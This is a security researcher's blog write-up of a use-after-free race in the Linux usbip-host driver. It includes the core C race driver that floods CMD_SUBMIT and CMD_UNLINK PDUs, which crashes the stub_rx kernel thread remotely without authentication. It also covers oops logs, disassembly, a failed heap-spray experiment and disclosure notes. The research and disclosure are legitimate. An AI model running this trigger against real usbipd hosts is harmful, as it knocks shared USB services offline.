Oh you thought I was done, did you ?
Last time I wrote about USB/IP, we discussed an issue I found in the Linux kernel related to USB-IP, but it was fixed before I could actually finish it, and at least confirm RIP control.
So I went back through my notes, and noticed I hadn’t actually fired one of the
entries, a server-side TOCTOU in stub_recv_cmd_unlink. The note next to it
said “clearly racy” and not much more. (yeah, in hindsight I should have
circled back sooner.)
So I poked at it, right ? It’s a UAF in stub_recv_cmd_unlink, in the server
side of usbip-host which means anyone who can reach a usbipd on TCP 3240 can
fire it. No authentication, no client setup, no clever PDU. Just a TCP
connection and a dream.
I’ll spare you a USB/IP primer this time, the previous post has one if you need it. Here’s the bug, the DoS, and the rabbit hole I went down trying to make it more than a DoS.
Spoiler: I didn’t get more than a DoS, but the why turned out to be interesting on its own. (at least to me)
the bug
stub_recv_cmd_unlink is what runs when a usbip client sends a CMD_UNLINK
PDU asking the server to cancel an in-flight URB. The relevant body (from
drivers/usb/usbip/stub_rx.c on current master) looks like this:
spin_lock_irqsave(&sdev->priv_lock, flags);
list_for_each_entry(priv, &sdev->priv_init, list) {
if (priv->seqnum != pdu->u.cmd_unlink.seqnum)
continue;
priv->unlinking = 1;
priv->seqnum = pdu->base.seqnum;
spin_unlock_irqrestore(&sdev->priv_lock, flags);
for (i = priv->completed_urbs; i < priv->num_urbs; i++) {
ret = usb_unlink_urb(priv->urbs[i]);
if (ret != -EINPROGRESS)
dev_err(&priv->urbs[i]->dev->dev,
"failed to unlink %d/%d urb of seqnum %lu, ret %d\n",
i + 1, priv->num_urbs,
priv->seqnum, ret);
}
return 0;
}
Notice the unlock right in the middle. The function walks priv_init, finds the
matching stub_priv, sets unlinking = 1, drops priv_lock, and then dereferences
priv from inside the for-loop body. Meanwhile, on a different CPU, the URB
completion bottom-half is doing its own thing in stub_complete:
} else if (priv->unlinking) {
stub_enqueue_ret_unlink(sdev, priv->seqnum, urb->status);
stub_free_priv_and_urb(priv);
}
If the URB completes between our unlock and our deref, stub_complete sees
unlinking == 1, frees the stub_priv via kmem_cache_free(stub_priv_cache, priv),
and now our loop body is reading from a dead object on the other CPU.
The bug has been there since the original USB/IP host driver landed in
staging (Takahiro
Hirofuchi, 2008-07-09). The unlock-then-deref pattern was in the very
first version of stub_rx.c and has survived every refactor since,
including the move out of drivers/staging/ into drivers/usb/usbip/.
Eighteen years.
firing it up
I built a tiny userspace client that does the usbip import handshake then writes
bursts of CMD_SUBMIT and CMD_UNLINK PDUs to the socket as fast as the kernel
will read them. SUBMITs are control IN to EP 0 (GET_DESCRIPTOR DEVICE, 18-byte
response).
UNLINKs target the seqnums of the SUBMITs we just sent. The kernel’s stub_rx
kthread reads them in order and dispatches each to stub_recv_cmd_submit or
stub_recv_cmd_unlink.
The race driver looks like this (error handling and PDU plumbing stripped for brevity, full source ships with the harness):
// SUBMIT: control IN, EP 0, GET_DESCRIPTOR DEVICE, 18-byte reply.
static void build_race_submit(struct usbip_header *pdu, uint32_t seqnum) {
pdu->base.command = htonl(USBIP_CMD_SUBMIT);
pdu->base.seqnum = htonl(seqnum);
pdu->base.direction = htonl(USBIP_DIR_IN);
pdu->base.ep = htonl(0);
pdu->u.cmd_submit.transfer_buffer_length = htonl(18);
static const uint8_t setup[8] = {
0x80, 0x06, 0x00, 0x01, 0x00, 0x00, 0x12, 0x00,
};
memcpy(pdu->u.cmd_submit.setup, setup, 8);
}
// UNLINK: targets the seqnum of a SUBMIT we sent earlier.
static void build_unlink(struct usbip_header *pdu, uint32_t seq,
uint32_t target_seq) {
pdu->base.command = htonl(USBIP_CMD_UNLINK);
pdu->base.seqnum = htonl(seq);
pdu->u.cmd_unlink.seqnum = htonl(target_seq);
}
// Main loop: 64 SUBMITs then 64 UNLINKs per writev, repeat.
for (;;) {
for (int i = 0; i < 64; i++) {
build_race_submit(&submits[i], seq + i);
build_unlink(&unlinks[i], seq + i + 1000000u, seq + i);
}
struct iovec iov[2] = {
{ submits, sizeof(submits) },
{ unlinks, sizeof(unlinks) },
};
writev(fd, iov, 2);
seq += 64;
}
The 64 SUBMITs end up in priv_init immediately. The completion bottom-half is
already starting to drain them on another CPU. By the time stub_rx gets to the
UNLINK burst, some URBs are still in flight, some have completed but are still in
priv_init for that short window, some have already been moved out. The unlinks
that catch the middle case race the completion, which is exactly where the bug
fires.
Trigger looks like this in dmesg, on the server (kernel 6.12.86 from
linux-image-6.12.86+deb13-amd64-unsigned):
Oops: general protection fault, probably for non-canonical address 0xe023fc5d3c4eb719: 0000
CPU: 4 UID: 0 PID: 221 Comm: stub_rx Not tainted 6.12.86+deb13-amd64 #1
RIP: 0010:stub_rx_loop.cold+0x122/0x289 [usbip_host]
Code: ... 48 8b 7a 40 ...
RDX: e023fc5d3c4eb6d9 RSI: ffffffffc028f9d0 RDI: ffff8880069608e0
Call Trace:
? __pfx_stub_rx_loop+0x10/0x10 [usbip_host]
kthread+0xd2/0x100
ret_from_fork+0x34/0x50
ret_from_fork_asm+0x1a/0x30
---[ end trace 0000000000000000 ]---
The faulting instruction (the <> bracketed bytes in the Code line) is
mov rdi, [rdx+0x40]. RDX comes from a few instructions earlier:
mov rdx, [r12+0x20] loads priv->urbs (offset 0x20 of stub_priv), then
mov rdx, [rdx + r14] reads priv->urbs[i] (the urb pointer). Then
mov rdi, [rdx+0x40] tries to read urb->dev. If priv is freed and reclaimed
at that point, priv->urbs[i] returns whatever the reclaiming object had at
that offset, and the kernel dereferences a non-canonical address.
The interesting bit (and where my own notes from a few days earlier were wrong)
is which read fires the UAF. I had assumed only priv->num_urbs (the loop
condition) was reachable on QEMU xhci, because num_urbs == 1 for IN control
transfers and so the inner body should only run once with i = 0 before priv
is freed.
stub_recv_cmd_submit sets num_urbs like this:
int num_urbs = 1;
...
if (use_sg) {
sgl = sgl_alloc(buf_len, GFP_KERNEL, &nents);
...
if (!support_sg) {
num_urbs = nents; // SG-split path: multi-URB
...
}
} else {
buffer = kzalloc(buf_len, GFP_KERNEL);
}
use_sg requires USBIP_URB_DMA_MAP_SG in the PDU flags and the
target USB bus to have sg_tablesize == 0. QEMU xhci does not satisfy
that, so we never reach the SG path. num_urbs stays 1, the loop runs
exactly once, i = 0, and naively that’s the only iteration where
priv->urbs[i] gets read.
Looking at the actual disasm and the RIP, the read that crashes is
inside the dev_err cold path, which only runs when usb_unlink_urb returns
something other than -EINPROGRESS. For URBs that have already completed by
the time we call usb_unlink_urb, it returns -ENOTCONN, the dev_err arm
fires, and that is where priv->urbs[i]->dev->dev reaches into a freed
slot. So the exploitable read happens further down the cold path than the
loop condition.
r2 on the trixie usbip-host.ko, around the faulting offset:
;-- sym.stub_rx_loop.cold:
...
0x08004af0 4d 8b 04 24 mov r8, qword [r12] ; priv->seqnum
0x08004af4 4a 8b 14 32 mov rdx, qword [rdx + r14] ; priv->urbs[i]
0x08004af8 48 8b 7a 40 mov rdi, qword [rdx + 0x40] ; urb->dev <-- FAULT
0x08004afc 44 89 ea mov edx, r13d
0x08004aff 48 81 c7 a8 00.. add rdi, 0xa8 ; &urb->dev->dev
0x08004b06 e8 00 00 00 00 call _dev_err
r12 is priv, r14 = i*8. The priv->urbs[i] load at 0x08004af4
goes through, but the urb->dev load at 0x08004af8 faults because
the urb pointer it just read is non-canonical, i.e. came from a slot
that has already been reclaimed with garbage.
The crash kills the stub_rx kthread for the connection. The kernel doesn’t
panic, it just oopses and the thread is gone. With it gone, no further PDUs
on that socket are processed, and the device’s usbip_status stays at 2
(SDEV_ST_USED) with nobody alive to use it. Service for that device is
wedged until module reload.
DoS ? ;D
Single TCP connection, no auth, ~5 seconds. Five trials in a row, five oopses, a very happy djnn.
From what I know most usbipd deployments are lab CI gear, container hosts that share USB peripherals over IP, kiosk-type embedded boxes. If any of those is reachable from your network, you can hose it from a single short program.
disclosure
So I emailed [email protected] about this when I first noticed it. The reply, paraphrasing the relevant part:
As stated many times on the linux-usb list, the usbip code is for trusted networks and connecting to trusted devices only. If you wish to fix up any potential issues like this, just send a patch to the linux-usb list like normal.
Fair enough. It’s their threat model, not mine. I do think “trusted
networks only” is doing a fair bit of work given that usbip-host ships
in stock distro kernels and the daemon listens on 0.0.0.0 by default,
but I’m not going to argue. If the maintainers say this is not a security issue,
then there’s no embargo, and no reason to hold the writeup.
So I’m publishing it, why not ?
If anyone on the linux-usb list wants to send a fix, feel free to email me. Happy to help if I can.
going for more
Every crash above has a different non-canonical address in RDX. So something
is grabbing the freed stub_priv slot fast, otherwise we’d just see a
clean read of the slab’s leftover bytes (which would also be non-canonical
in some cases, but the variance across crashes means actual reclaim is
happening, not just stale-content reads).
Three runs back-to-back on the same kernel, the relevant lines from each:
[ 4.295] Oops: general protection fault, probably for non-canonical address 0x97995d0f4fde9c3c
[ 4.307] RDX: 97995d0f4fde9bfc RSI: ffffffffc028f9d0 RDI: ffff888005dc40e0
[ 4.793] Oops: general protection fault, probably for non-canonical address 0x2b1a46ae1ac3c8c0
[ 4.801] RDX: 2b1a46ae1ac3c880 RSI: ffffffffc02e09d0 RDI: ffff888005a96b08
[ 3.536] Oops: general protection fault, probably for non-canonical address 0x7d995215a913d025
[ 3.548] RDX: 7d995215a913cfe5 RSI: ffffffffc027e9d0 RDI: ffff888006123 8e0
Same RIP every time (stub_rx_loop.cold+0x122, the urb->dev deref).
Completely different RDX values. Three separate kernel allocations
landed in that 64-byte slot in the few microseconds the bh handler had
between freeing priv and the deref reading it back.
Question is: what’s doing the reclaiming, and can we make it be us ? That would be a cool primitive.
experiment A: what slab cache does stub_priv even live in
stub_priv is allocated via kmem_cache_zalloc(stub_priv_cache, ...). The cache
is created with KMEM_CACHE(stub_priv, SLAB_HWCACHE_ALIGN). SLAB_HWCACHE_ALIGN
isn’t in SLAB_NEVER_MERGE, so the cache is mergeable, which means SLUB will
merge it into a generic kmalloc-N bucket if one of compatible size and flags is
available.
I wrote a small probe that boots an arbitrary distro kernel deb in QEMU, loads
just usbip-host and its deps, and dumps /sys/kernel/slab/stub_priv. If it’s
a symlink, the cache has been merged. If it’s a regular directory, it’s standalone.
I tested with three production kernels:
| kernel | merged into | object size | aliases |
|---|---|---|---|
| Debian 12 6.1.0-47-amd64 | :0000064 |
64 | 7 |
| Debian 13 6.12.86+deb13-amd64 | :0000064 |
64 | 5 |
| Ubuntu 24.04 HWE 6.17.0-29-generic | :0000064 |
64 | 9 |
Same answer on all three: stub_priv merges into the 64-byte slab pool,
alongside 6-8 other small driver allocations. So a kmalloc(64, GFP_KERNEL)
from anywhere in the kernel lands in the same physical pool as a freshly
freed stub_priv.
One gotcha if you’re debugging this on a KASAN kernel: KASAN sets the SLAB_KASAN
flag on every cache, which is in SLAB_NEVER_MERGE. So on a KASAN-instrumented
kernel the cache is standalone and I could not get the spray to work. If
your reclaim suddenly stops landing when you turn KASAN on, this is probably why.
Annoying, but whatever.
Anyway: the slab side of the spray plan seems to check out on production kernels.
experiment B: spray cookies, count hits
stub_recv_cmd_submit allocates the URB’s transfer_buffer with
buffer = kzalloc(buf_len, GFP_KERNEL) where buf_len is the client-controlled
transfer_buffer_length field of the CMD_SUBMIT PDU.
There’s no upper bound check on this value. So if the client sends
CMD_SUBMIT with transfer_buffer_length = 64, the server does a 64-byte
kzalloc from the network path. And for OUT-direction transfers, the next 64
bytes the client sends are read directly into that buffer.
So we have a network-driven kmalloc(64) with attacker-controlled contents.
Beautiful primitive, in theory.
I extended the attacker to interleave race bursts (CMD_SUBMIT IN GET_DESCRIPTOR
then CMD_UNLINK) with spray bursts (CMD_SUBMIT OUT, 64-byte payload of a
recognizable cookie pattern with high byte 0xC0).
Five trials on stock Debian 13 6.12.86:
trial,gpf,fault_rdx,cookie_byte_match
1,1,13127dfabb69b4a9,no
2,1,28d1ae7de2518368,no
3,1,fb544a7c1e7292d0,no
4,1,893aa666ca6f32d6,no
5,1,3d53d02455411abe,no
Five for five GPFs, zero for five cookie hits. So reclaim is happening reliably under attacker pressure (otherwise we wouldn’t see the variance in RDX), but the reclaiming object isn’t our spray buffer. It’s something else in the kernel, taking 64-byte slots off the same merged cache.
Which raises the obvious question.
the wall
note: all of this lies on my imperfect, incomplete understanding. this might be wrong, thread carefully.
SLUB’s allocator is per-CPU, right ? Each CPU has its own active slab page
and its own freelist. When the URB completion handler runs on the bottom-half
CPU and calls kmem_cache_free(stub_priv_cache, priv), the freed object goes
onto that CPU’s local freelist. The very next kmalloc(64) on that same CPU
pops the slot back out, immediately, ahead of any other CPU.
Our spray PDUs arrive over TCP. The kernel’s stub_rx kthread for our
connection reads them, runs stub_recv_cmd_submit, calls kzalloc(64). That kzalloc
runs on whatever CPU stub_rx was scheduled on. Which is almost never the
same CPU as the xhci bottom-half that just freed our priv. Different CPU,
different per-CPU freelist, the slot is already gone by the time our spray
runs.
Roughly:
CPU 3 (xhci IRQ -> bh worker) CPU 6 (stub_rx for our spray socket)
============================= ====================================
stub_complete(urb) stub_recv_cmd_submit(sdev, pdu)
kmem_cache_free(stub_priv_cache, priv) ...
// freed slot pushed onto CPU 3's // a few microseconds later
// per-cpu freelist buffer = kzalloc(64, GFP_KERNEL)
// pops from CPU 6's freelist,
// not CPU 3's
Whoever does the next kmalloc(64) on CPU 3 wins the slot. Background
kernel activity on that CPU does many of those per millisecond. Our
spray running on CPU 6 cannot compete because it is not on the same
freelist.
My guess is the reclaim we do see in crashes is from background kernel allocations happening on the bh CPU between the free and the next deref. Could be skb fragments, could be small allocations during IRQ handling, could be anything that does a 64-byte alloc on that specific CPU in that microsecond window.
I tried multi-connection: open three usb-tablet devices, bind each to
usbip-host, import each on a separate TCP connection.
Didn’t work. In fact the race itself stopped firing reliably (0/N GPFs).
The extra xhci device activity changes the completion timing, the unlinks
end up returning -EINPROGRESS instead of -ENOTCONN, and the dev_err
cold path never fires.
privesc ?
To set that up, you would need:
- a KASLR leak (this bug doesn’t give you one)
- heap layout primitive to place fake
struct urb, fakeusb_device, fakeusb_bus, fakehc_driverat predictable, mutually-reachable offsets - a kCFI bypass on any kernel built with
CONFIG_CFI_CLANG, which is most modern distro builds at this point (not Debian 12 6.1, but Debian 13 trixie ships clang-built kernels and Ubuntu 24.04 does, Fedora has for a while) - probably multiple race wins for setup
That’s a serious exploit-dev effort, weeks of work, for an RIP primitive in a threat model that is “unprivileged local on a host running usbip-host”. Machines that have unprivileged shell users and export USB devices over IP aren’t that common. Not exactly the meaty thing you write a Pwn2Own ticket about.
I’ll leave it as homework for anyone who needs a CVE-numbered write-up on their CV. The pieces are all here, just buy me a beer if you run into me at a conference.
demo and stuff
I’ll release the repo once the previous article’s patches are visibly backported into Debian 12 stable, same gate as before. The DoS-only nature of this finding means the release timing matters less, but I’d rather ship it all together.
For the impatient, this is what dos_demo.sh prints (trimmed):
================================================================
STEP 1: usbip-host loaded, device 1-1 bound, no clients
================================================================
-- lsmod (usbip rows):
usbip_host 45056 0
usbip_core 36864 1 usbip_host
-- usbip_status (0=unused, 1=available, 2=in-use):
1
-- kthreads matching stub_/usbip_:
(empty: nothing has connected yet, kernel hasn't spawned stub_rx/stub_tx)
================================================================
STEP 2: TCP connection from 127.0.0.1, kernel took over socket
================================================================
-- usbip_status after import:
2 (changed from 1 to 2 = SDEV_ST_USED)
================================================================
STEP 3: kernel activity during the attack (first 8 dmesg lines)
================================================================
[ 3.504] usbip-host 1-1: stub up
[ 3.507] usbip-host 1-1: failed to unlink 1/1 urb of seqnum 1000032, ret -43
...
================================================================
STEP 4: kernel oops (verbatim, from the same dmesg window)
================================================================
[ 3.536] Oops: general protection fault, probably for non-canonical address 0x7d995215a913d025
[ 3.541] RIP: 0010:stub_rx_loop.cold+0x122/0x289 [usbip_host]
[ 3.548] RDX: 7d995215a913cfe5 RSI: ffffffffc027e9d0
[ 3.557] Call Trace:
[ 3.557] ? __pfx_stub_rx_loop+0x10/0x10 [usbip_host]
[ 3.558] kthread+0xd2/0x100
[ 3.560] ret_from_fork+0x34/0x50
================================================================
STEP 5: kthread state after the oops
================================================================
-- ps filtered to stub_/usbip_ kthreads:
228 0 [stub_tx]
(compare with STEP 1: stub_tx is still alive; stub_rx is gone)
================================================================
STEP 6: attacker still sending PDUs, kernel not processing them
================================================================
Attacker process 225 still alive: yes
Dmesg lines added in last 5s while attacker hammers:
total new lines: 0
new 'failed to unlink': 0
(If you really want it sooner, email me. I’m not going to gatekeep research code from people who have a use for it.)
so what
The bug existed for about fifteen years, and it’s a pretty simple bug when you think about it.
Eventually, I got stuck, but that was the exciting bit for me. I really went in confident, thinking that some amount of spray tuning would land the cookie, but I was wrong. Sometimes the bug is just a bug, the impact is moderate, the defenders win, you write it up and move on.
Whatever. The hacking will not stop until morale improves.
See you next time :)~